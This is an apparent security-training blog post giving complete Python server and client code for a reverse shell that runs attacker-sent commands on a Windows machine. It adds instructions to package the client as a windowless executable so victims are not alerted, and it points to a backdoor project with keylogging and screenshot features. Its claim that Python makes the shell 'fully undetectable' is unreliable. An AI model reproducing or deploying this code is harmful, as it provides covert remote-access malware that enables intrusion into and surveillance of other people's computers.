Creating a Windows EXE FUD Reverse Shell in Python

December 25, 2017 | Views: 4588

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

What Is A Shell

A shell is acts as an interface between the user and Operating system. You can use a shell to do many things such as view files, launch applications,  check network configurations, etc. Some examples would be Powershell in Windows and the Terminal in Linux.

Reverse vs Bind Shells

The reverse and bind shells both have the same purpose, to allow for remote access to a computer. The difference between the two is how the connection is initiated. A bind shell acts as a server on the target meaning the attacker has to connect to it. The reverse shell acts as a client, meaning the attacker needs to set up a server to allow the reverse shell to connect back.

Why use Reverse Shells?

If both shells serve the same purpose why are reverse shells generally considered better? Reverse shells are favored more mainly due to how a firewall acts. Generally a firewall will not allow a non admin/root program to open a lower port number. They also usually attempt to stop any application that makes the computer act as a server and block any incoming connections. However, a reverse shell connects to the attacker and a firewall generally won’t block outgoing connections, otherwise the user may not be able to access the net. The reverse shell has the advantages of bypassing the firewall AND running without admin/root.

How the code will work

The code will utilize two standard library python modules, socket and subprocess. The attackers server will wait on a specific port for the reverse shell to connect back. Once a connection is initiated, the attacker sends a string to the reverse shell which will then take that string and execute it as a system command before returning the output. The best part is that it is FUD(Fully undetectable) as this is coded in a interpreted language. However you CAN compile the script into a windows executable using pyinstaller so it can run without the interpreter.

Server Code

The code is simple enough, bind to a port and wait for a connection before looping in a send and recv pattern to send commands and recv output.

import socket

s = socket.socket()

s.bind((‘0.0.0.0’,4444))

s.listen(1)

c, a = s.accept()

print ‘[!]Reverse shell connected back’

while True:

command_to_send = raw_input(‘Reverse Shell > ‘)

c.send(command_to_send)

output = c.recv(99999)

print ‘[+]Command executed remotely :n’

print output

Client Code

The client code loops in an attempt to connect to the attacker before waiting for and then executing commands. You can change the ip_addr and port_number variable to suit your servers IP and port.

import socket, subprocess

ip_addr = ‘127.0.0.1’

port_number = 4444

s = socket.socket()

while True:

try:

s.connect((ip_addr, port_number))

break

except (socket.error, socket.timeout):

continue

while True:

command_to_exe = s.recv(99999)

result =  subprocess.Popen(command_to_exe, shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE, stdin = subprocess.PIPE)

result = result.stdout.read() + result.stderr.read()

s.send(result)

And that’s all that’s needed to create a reverse shell in python.

Compiling to a windows executable

Since python scripts can’t run without the interpreter, you need to use a tool called pyinstaller ,which is NOT included with the default python installation, to convert the script into a windows executable. We are going to save the client code as client.py. Open a local system shell and type in :

pyinstaller –windowed –onefile client.py

This created a packed python executable that runs without a visible GUI window so the user is not alerted to anything suspicious.

Conclusion

This is not all that the reverse shell can do. The one we coded is extremely basic. However you can code more and more complex reverse shells. I have created reverse shells that have even more functionality such as file transfer, keylogging and screenshotting. This is not all that you are limited to. If you want to see examples of much more complex reverse shells you can visit my Github Repo :

https://www.github.com/angus-y/PyIris-backdoor

I’m working on a project called PyIris which utilizes reverse shells that are much more complex and that can do much more than the one featured here. If your creative enough, you can make your reverse shells do anything. Since it’s written in python it’s FUD.

 

Have fun, anything is possible :).

 

Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Ready to share your knowledge and expertise?
1 Comment
  1. is it really fud?

Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel